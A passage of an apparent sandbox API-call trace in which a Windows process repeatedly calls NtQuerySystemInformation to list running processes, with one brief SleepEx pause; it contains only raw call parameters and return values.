SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1a108) returned 0x0 [0108.576] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0113.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5e0) returned 0x0 [0113.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0113.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b510) returned 0x0 [0113.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, 